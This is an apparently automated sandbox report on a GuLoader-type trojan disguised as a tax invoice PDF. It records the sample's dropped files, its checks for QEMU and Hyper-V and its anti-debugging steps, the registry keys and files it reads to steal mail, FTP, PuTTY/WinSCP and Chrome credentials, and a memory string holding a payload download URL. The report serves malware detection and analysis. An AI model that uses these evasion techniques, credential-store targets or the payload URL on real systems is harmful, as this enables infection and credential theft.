ADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDI
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe, 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameForm_Pilleorms8.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDI
      Source: Form_Pilleorms8.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeVirustotal: Detection: 50%
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeReversingLabs: Detection: 53%
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeFile read: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeJump to behavior
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe "C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe"
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeJump to behavior
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsn9823.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/4@2/3
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
      Source: NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000009.00000000.787227598.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_0816273A push FFFFFF9Eh; ret 1_2_0816277B
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_08162A4B push ss; retf 1_2_08162A55
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 9_2_00570397 pushfd ; ret 9_2_00570398
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)Jump to dropped file
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Form_Pilleorms8.exe, 00000009.00000002.890831982.0000000002310000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1VEL8-EKCR0IVRL8U50SHCZNZH1TCA62N
      Source: Form_Pilleorms8.exe, 00000001.00000002.788505420.0000000008AA0000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890831982.0000000002310000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: Form_Pilleorms8.exe, 00000001.00000002.788505420.0000000008AA0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe TID: 5384Thread sleep count: 450 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe TID: 6248Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeWindow / User API: threadDelayed 450Jump to behavior
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeSystem information queried: ModuleInformationJump to behavior
      Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: Form_Pilleorms8.exe, 00000001.00000002.788505420.0000000008AA0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: Form_Pilleorms8.exe, 00000009.00000002.890831982.0000000002310000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1vel8-ekCr0ivRl8u50SHCZNZh1tCa62N
      Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
      Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: vmicvss
      Source: Form_Pilleorms8.exe, 00000001.00000002.788505420.0000000008AA0000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890831982.0000000002310000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: Form_Pilleorms8.exe, 00000001.00000002.788686469.0000000008CBA000.00000004.00000001.sdmp, Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: Form_Pilleorms8.exe, 00000009.00000002.890840304.00000000023DA000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_0816C813 mov eax, dword ptr fs:[00000030h]1_2_0816C813
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_0816BA58 mov eax, dword ptr fs:[00000030h]1_2_0816BA58
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_0816DC4B mov eax, dword ptr fs:[00000030h]1_2_0816DC4B
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_081690F1 mov eax, dword ptr fs:[00000030h]1_2_081690F1
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeCode function: 1_2_081694DA LdrInitializeThunk,1_2_081694DA
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeProcess created: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Tries to steal Mail credentials (via file / registry access)Show sources
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
      Tries to harvest and steal ftp login credentialsShow sources
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection11Virtualization/Sandbox Evasion211Input Capture1Security Software Discovery31Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Credentials in Registry1Virtualization/Sandbox Evasion211SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSApplication Window Discovery1Distributed Component Object ModelData from Local System2Scheduled TransferApplication Layer Protocol115SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System Discovery1SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery6Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe51%VirustotalBrowse
      NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe54%ReversingLabsWin32.Trojan.Shelsy

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe100%Joe Sandbox ML

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

